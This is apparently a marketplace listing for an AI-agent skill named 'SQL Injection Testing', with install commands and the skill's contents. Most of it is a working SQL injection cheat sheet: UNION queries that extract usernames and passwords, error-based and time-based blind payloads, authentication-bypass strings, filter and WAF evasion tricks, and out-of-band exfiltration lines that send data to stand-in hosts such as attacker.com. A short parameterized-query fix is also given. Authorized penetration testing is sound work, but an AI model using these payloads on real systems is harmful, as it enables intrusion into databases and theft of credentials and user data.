Perform authorized security tests to detect, exploit, and validate defenses against SQL injection vulnerabilities in web applications.
数据来源:ClawHub。 在 ClawSkills 查看
选择你使用的 Agent
方法一:命令行安装(推荐)
推荐(无需提前安装 clawhub)
npx clawhub@latest --dir ~/.claude/skills install sql-injection-testing或使用 clawhub CLI(需提前安装)
clawhub --dir ~/.claude/skills install sql-injection-testing⚠️ 需要 Node.js 18+,没有 Node?请使用下方方法二直接下载 ZIP。 安装 Node.js →
方法二:手动下载安装(无需 Node)
下载 ZIP,解压后将文件夹放到以下路径,重启 Agent 即可:
安装路径
~/.claude/skills/sql-injection-testing/💡解压后将文件夹放到上方路径,重启 Agent 即可生效
Comprehensive SQL injection vulnerability assessment techniques for web applications, covering detection, exploitation, and defense validation.
USE WHEN:
DON'T USE WHEN:
⚠️ LEGAL REQUIREMENT: Written penetration testing authorization required before use.
---
Common injectable parameters:
URL params: ?id=1, ?user=admin, ?category=books
Form fields: username, password, search, comments
Cookies: session_id, user_preference
HTTP headers: User-Agent, Referer, X-Forwarded-For-- Single quote test
'
-- Double quote test
"
-- Comment sequences
--
#
/**/
-- Semicolon for query stacking
;Watch for:
-- True condition (should return data)
page.asp?id=1 or 1=1
page.asp?id=1' or 1=1--
page.asp?id=1" or 1=1--
-- False condition (should return nothing/error)
page.asp?id=1 and 1=2
page.asp?id=1' and 1=2--Compare responses between true/false to confirm injection.
---
-- Step 1: Determine column count
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
-- Continue until error occurs
-- Step 2: Find displayable columns
UNION SELECT NULL,NULL,NULL--
UNION SELECT 'a',NULL,NULL--
UNION SELECT NULL,'a',NULL--
-- Step 3: Extract data
UNION SELECT username,password,NULL FROM users--
UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'---- MSSQL
1' AND 1=CONVERT(int,(SELECT @@version))--
-- MySQL (XPATH)
1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--
-- PostgreSQL
1' AND 1=CAST((SELECT version()) AS int)---- Character extraction
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--
-- Conditional responses
1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0---- MySQL
1' AND IF(1=1,SLEEP(5),0)--
1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--
-- MSSQL
1'; WAITFOR DELAY '0:0:5'--
-- PostgreSQL
1'; SELECT pg_sleep(5)---- MSSQL DNS exfiltration
1; EXEC master..xp_dirtree '\\attacker-server.com\share'--
-- MySQL DNS
1' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--
-- Oracle HTTP
1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual-----
-- Classic bypass payloads
admin'--
admin'/*
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
') OR ('1'='1
') OR ('1'='1'--
-- Query transformation example
-- Original: SELECT * FROM users WHERE username='input' AND password='input'
-- Injected (username: admin'--):
-- SELECT * FROM users WHERE username='admin'--' AND password='anything'
-- Password check bypassed!---
-- URL encoding
%27 (single quote)
%22 (double quote)
%23 (hash)
-- Double URL encoding
%2527 (single quote)
-- Hex strings (MySQL)
SELECT * FROM users WHERE name=0x61646D696E -- 'admin'-- Comment substitution
SELECT/**/username/**/FROM/**/users
-- Tab character
SELECT%09username%09FROM%09users
-- Newline
SELECT%0Ausername%0AFROM%0Ausers-- Case variation
SeLeCt, sElEcT, SELECT
-- Inline comments
SEL/*bypass*/ECT
UN/*bypass*/ION
-- Double writing (if filter removes once)
SELSELECTECT → SELECT
UNUNIONION → UNION---
| Database | Version Query | |----------|---------------| | MySQL | SELECT @@version or SELECT version() | | MSSQL | SELECT @@version | | PostgreSQL | SELECT version() | | Oracle | SELECT banner FROM v$version | | SQLite | SELECT sqlite_version() |
---
-- MySQL/MSSQL: List tables
SELECT table_name FROM information_schema.tables WHERE table_schema=database()
-- List columns
SELECT column_name FROM information_schema.columns WHERE table_name='users'
-- Oracle equivalent
SELECT table_name FROM all_tables
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'---
| Purpose | Payload | |---------|---------| | Basic test | ' or " | | Boolean true | OR 1=1-- | | Boolean false | AND 1=2-- | | Comment (MySQL) | # or -- | | Comment (MSSQL) | -- | | UNION probe | UNION SELECT NULL-- | | Time delay | AND SLEEP(5)-- | | Auth bypass | ' OR '1'='1 |
---
1. Insert ' → Check for error
2. Insert " → Check for error
3. Try: OR 1=1-- → Check for behavior change
4. Try: AND 1=2-- → Check for behavior change
5. Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay---
const query = `SELECT * FROM users WHERE id = '${userId}'`;// Parameterized query
const query = 'SELECT * FROM users WHERE id = $1';
const result = await db.query(query, [userId]);
// OR use ORM
const user = await prisma.user.findUnique({ where: { id: userId } });---
---
| Problem | Solution | |---------|----------| | No error messages | Use blind injection (boolean/time-based) | | UNION fails | Check column count with ORDER BY | | WAF blocking | Use encoding/evasion techniques | | Payload not executing | Verify correct comment syntax for DB type | | Time-based inconsistent | Use longer delays (10+ seconds) |
---
安装 SQL Injection Testing 后,可以对 AI 说这些话来触发它
Help me get started with SQL Injection Testing
Explains what SQL Injection Testing does, walks through the setup, and runs a quick demo based on your current project
Use SQL Injection Testing to perform authorized security tests to detect, exploit, and validate ...
Invokes SQL Injection Testing with the right parameters and returns the result directly in the conversation
What can I do with SQL Injection Testing in my developer & devops workflow?
Lists the top use cases for SQL Injection Testing, with example commands for each scenario
将技能文件夹放到 ~/.claude/skills/sql-injection-testing/ 目录(个人级,所有项目可用),或 .claude/skills/sql-injection-testing/(项目级)。重启 AI 客户端后,用 /sql-injection-testing 主动调用,或让 AI 根据上下文自动发现并使用。
SQL Injection Testing 支持 Claude、Cursor、OpenClaw,可与这些 AI 平台无缝集成,扩展其能力。
SQL Injection Testing 可免费安装使用。请查阅仓库了解许可证信息。
Perform authorized security tests to detect, exploit, and validate defenses against SQL injection vulnerabilities in web applications.
SQL Injection Testing 属于「Developer & DevOps」分类,该分类的技能帮助 AI 智能体在此领域执行专业任务。
Automate my developer & devops tasks using SQL Injection Testing
Identifies repetitive steps in your workflow and sets up SQL Injection Testing to handle them automatically